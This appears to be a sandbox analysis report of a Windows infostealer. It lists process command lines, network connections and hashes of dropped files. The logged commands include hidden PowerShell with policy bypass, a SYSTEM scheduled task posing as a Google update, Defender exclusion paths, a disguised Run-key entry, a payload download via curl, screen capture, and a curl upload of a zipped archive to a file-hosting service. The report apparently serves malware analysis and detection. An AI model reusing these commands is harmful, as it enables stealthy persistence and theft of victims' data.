powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"

C:\Windows\system32\schtasks.exe

schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""

C:\Windows\system32\cscript.exe

cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get serialnumber

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tqr0iaas\tqr0iaas.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES93B4.tmp" "c:\Users\Admin\AppData\Local\Temp\tqr0iaas\CSC4E6C8135414A4B0683AD5297B3316BA.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController GET Description,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic memorychip get serialnumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get processorid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"

C:\Windows\system32\getmac.exe

getmac /NH

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f

C:\Windows\system32\reg.exe

reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"

C:\Windows\system32\curl.exe

curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Ngomewng.zip";"

C:\Windows\system32\curl.exe

curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Ngomewng.zip";

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"

C:\Windows\System32\Wbem\WMIC.exe

wmic bios get smbiosbiosversion

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""

C:\Windows\System32\Wbem\WMIC.exe

wmic MemoryChip get /format:list

C:\Windows\system32\find.exe

find /i "Speed"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:49851 tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:80 tcp
N/A 224.0.0.251:5353 udp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
DE 49.13.193.134:443 api.filedoge.com tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:49966 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 34.117.118.44:443 www.myexternalip.com tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 172.67.205.179:443 mrbfederali.cam tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:49989 tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50006 tcp
N/A 127.0.0.1:50026 tcp
US 104.26.13.205:80 api.ipify.org tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50046 tcp
N/A 127.0.0.1:50092 tcp
US 104.26.13.205:80 api.ipify.org tcp
N/A 127.0.0.1:50130 tcp
N/A 127.0.0.1:50150 tcp
N/A 127.0.0.1:50176 tcp
N/A 127.0.0.1:80 tcp
N/A 127.0.0.1:50207 tcp
N/A 127.0.0.1:50227 tcp
N/A 127.0.0.1:50247 tcp
N/A 127.0.0.1:50267 tcp
GB 184.28.176.19:443 tcp
US 13.89.178.27:443 browser.pipe.aria.microsoft.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp
NL 23.62.61.72:443 r.bing.com tcp

Files

memory/896-0-0x00007FFFFCD43000-0x00007FFFFCD45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jeebskcv.gpp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/896-10-0x000001A41EDB0000-0x000001A41EDD2000-memory.dmp

memory/896-9-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp

memory/896-11-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp

memory/896-12-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe

MD5 8eacf3f9be7e3735352c4020fc4e05e9
SHA1 0bb6c048d9e683e152de21f7d368a4c151095504
SHA256 4c5b20b4ca8009ab72a76ed7fa6e09bd1b0b78969980f2b49d9a6641439c8d7e
SHA512 2f5c54c4561f14fbf9a58075dffe268247f3af3408084c12a8a7ed0fbb33f01448e85a06ba684b037e0489fbcbb7481a825cf23785c7b7c1d60c28467825e3f0

memory/896-25-0x00007FFFFCD40000-0x00007FFFFD802000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\AppData\Local\Temp\Executor\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

memory/1008-108-0x0000020CCCD80000-0x0000020CCCDC6000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.cmdline

MD5 84c078e4db612b0dafa3de8198b996c1
SHA1 2361ae986c022878d0ca959887e68a6a14f05705
SHA256 62cab83c1405342619af0c32ffbd051ac370a15f283486994d00724fe2eac531
SHA512 ead7d1cf58530ea65387a71ca6c8aff8ae031544e914b2cde7deb3271ed7f92389fd5054c9c7b80fd3b1e2bce6017d86809211980acc1ce58b10b4bc74969209

\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\hu2o0w5k\CSCF175916096AE4A709A7D4E890657D51.TMP

MD5 3995921343802870743f360b5290b4d3
SHA1 de04cb85bf6f53b45a74dbe80d2646077af3cb12
SHA256 5ebd1ff57d9729443caf371d0f34dce16c6bf5fab37fcb358d269168c0124148
SHA512 7499600eba32de4aa4159c195157387366265e4a279453b3572d9bb7e840045757fc22ccf817228d7accc1c2a79f55571013f9f77489f3ace5db5f580bac79bb

C:\Users\Admin\AppData\Local\Temp\RES8CDE.tmp

MD5 09e347f4faa2a5b4e6a022b95c5f3c59
SHA1 6161f7233fb3add8cd72b5a379affafb549f66e7
SHA256 26b588bc711a7bab1583720fb4a642ed88020dd38c40836f92f1ff531f69b0c1
SHA512 3ca8ba258888da4ac876118d4d3552878ae014e246c4a8c2e02be59bffe54ba7a98297b9006a17883c3bfb458876df31a97adec59fb8097e7a8df416ce045f47

memory/1008-121-0x0000020CCC8F0000-0x0000020CCC8F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\hu2o0w5k\hu2o0w5k.dll

MD5 fd5e45a81ce79a95fc3688599b3e7c28
SHA1 c24801a296a061bd50a56f6263b696c1532dfb77
SHA256 8cf7e867986c516ef5cdd55060da798c49508557a3a01df2843ad52fea0032a2
SHA512 933feb0a1191f75a874f95633fd34b0de154e8571dc495a4c94bad2b2e56238450d0502cbe50af4b6abd847bd9190af541746e9669ab99a0f5a1b7b63cb9c119

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5e6baeec02c3d93dce26652e7acebc90
SHA1 937a7b4a0d42ea56e21a1a00447d899a2aca3c28
SHA256 137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0
SHA512 461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

memory/4584-134-0x000002A357BF0000-0x000002A357C40000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6b60063de9d34ef9fcca516b9aa3e024
SHA1 5041e194dd6a879dc811f69c46bb6490d7012f85
SHA256 22166d037fb310b137e38f5a622c0675bd3834ec04743cb9a737cd797990d36b
SHA512 0335951eec844cfa869efbbb15e58c9bbd36c1f26d4859c5f4c2f6878b14ff4dba704f6ae05340eaec4fbb738a10a283d4d5df36a9ffbc9e22ddfc8765917a55

C:\ProgramData\Steam\Launcher\EN-Ngomewng\debug.log

MD5 170569906646d8cc72bf8ab80e606b7e
SHA1 69afd238f8b58c4d637ae4796ed9bdc2a82811d3
SHA256 a30a91f63953a04da97cd2ef6737c068d3375bacd7bfcb62e5e58a8eb8439261
SHA512 97df20770eaf89b312abf961a9f8876bf7338e327cf96eeb0367497b4823428682b019a94c0cacb078523ae805ecf905abea6545664b31428095b7f4dbdf5ef4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ae09b9726ad193e95ef8ec470a3dfafb
SHA1 451e263a3c9fc8011c29ca04a56cc4a632b33efd
SHA256 065a26846f8eb0e69adbafdbb536dfb627f9c739ab011c7f01b07e5db9ff4786
SHA512 fa3443e3f985d37f5774ab8492a13b058c0015d65777d736d52c3239517c53560a6465f0f962aa150c8a6434d0604a8aae095ee129bf20542e468810d9d2a796

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

